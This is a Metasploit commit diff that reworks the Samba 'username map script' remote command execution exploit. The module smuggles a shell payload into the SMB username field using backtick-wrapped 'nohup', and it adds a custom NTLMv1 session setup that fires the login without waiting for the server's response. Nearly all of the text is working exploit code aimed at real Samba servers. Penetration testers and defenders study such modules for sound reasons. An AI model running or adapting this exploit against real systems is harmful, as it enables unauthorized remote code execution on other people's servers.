yield the session faster by not waiting for a response
git-svn-id: file:///home/svn/framework3/trunk@9911 4d416f70-5f16-0410-b530-b9f4589650daunstable
Joshua Drake
parent
6e34bc5420
commit
84e3a95d2b
|
|
@ -16,6 +16,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
include Msf::Exploit::Remote::SMB
|
||||
|
||||
# For our customized version of session_setup_ntlmv1
|
||||
CONST = Rex::Proto::SMB::Constants
|
||||
CRYPT = Rex::Proto::SMB::Crypt
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Samba "username map script" Command Execution',
|
||||
|
|
@ -65,27 +69,68 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
Opt::RPORT(139)
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def smb_login
|
||||
# lol?
|
||||
username = "/=`nohup " + payload.encoded + "`"
|
||||
begin
|
||||
simple.login_split_start_ntlm1(datastore['SMBName'])
|
||||
simple.login_split_next_ntlm1(username, datastore['SMBDomain'], rand_text(8), rand_text(8))
|
||||
rescue XCEPT::LoginError => e
|
||||
print_error("#{e}")
|
||||
|
||||
# Authenticate using NTLMv1
|
||||
def session_setup_ntlmv1(user = '', pass = '', domain = '')
|
||||
|
||||
raise XCEPT::NTLM1MissingChallenge if not self.simple.client.challenge_key
|
||||
|
||||
if (pass.length == 65)
|
||||
hash_lm = CRYPT.e_p24( [ pass.upcase()[0,32] ].pack('H42'), self.simple.client.challenge_key)
|
||||
hash_nt = CRYPT.e_p24( [ pass.upcase()[33,65] ].pack('H42'), self.simple.client.challenge_key)
|
||||
else
|
||||
hash_lm = pass.length > 0 ? CRYPT.lanman_des(pass, self.simple.client.challenge_key) : ''
|
||||
hash_nt = pass.length > 0 ? CRYPT.ntlm_md4(pass, self.simple.client.challenge_key) : ''
|
||||
end
|
||||
|
||||
data = ''
|
||||
data << hash_lm
|
||||
data << hash_nt
|
||||
data << user + "\x00"
|
||||
data << domain + "\x00"
|
||||
data << self.simple.client.native_os + "\x00"
|
||||
data << self.simple.client.native_lm + "\x00"
|
||||
|
||||
pkt = CONST::SMB_SETUP_NTLMV1_PKT.make_struct
|
||||
self.simple.client.smb_defaults(pkt['Payload']['SMB'])
|
||||
|
||||
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_SESSION_SETUP_ANDX
|
||||
pkt['Payload']['SMB'].v['Flags1'] = 0x18
|
||||
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
|
||||
pkt['Payload']['SMB'].v['WordCount'] = 13
|
||||
pkt['Payload'].v['AndX'] = 255
|
||||
pkt['Payload'].v['MaxBuff'] = 0xffdf
|
||||
pkt['Payload'].v['MaxMPX'] = 2
|
||||
pkt['Payload'].v['VCNum'] = 1
|
||||
pkt['Payload'].v['PasswordLenLM'] = hash_lm.length
|
||||
pkt['Payload'].v['PasswordLenNT'] = hash_nt.length
|
||||
pkt['Payload'].v['Capabilities'] = 64
|
||||
pkt['Payload'].v['SessionKey'] = self.simple.client.session_id
|
||||
pkt['Payload'].v['Payload'] = data
|
||||
|
||||
self.simple.client.smb_send(pkt.to_s)
|
||||
|
||||
# We don't care how the server responds, we should have a session already :)
|
||||
# And such is our leet customization.
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
|
||||
connect
|
||||
smb_login
|
||||
|
||||
# lol?
|
||||
username = "/=`nohup " + payload.encoded + "`"
|
||||
begin
|
||||
simple.client.negotiate(false)
|
||||
session_setup_ntlmv1(username, rand_text(16), datastore['SMBDomain'])
|
||||
rescue ::Timeout::Error, XCEPT::LoginError
|
||||
# nothing
|
||||
end
|
||||
|
||||
handler
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue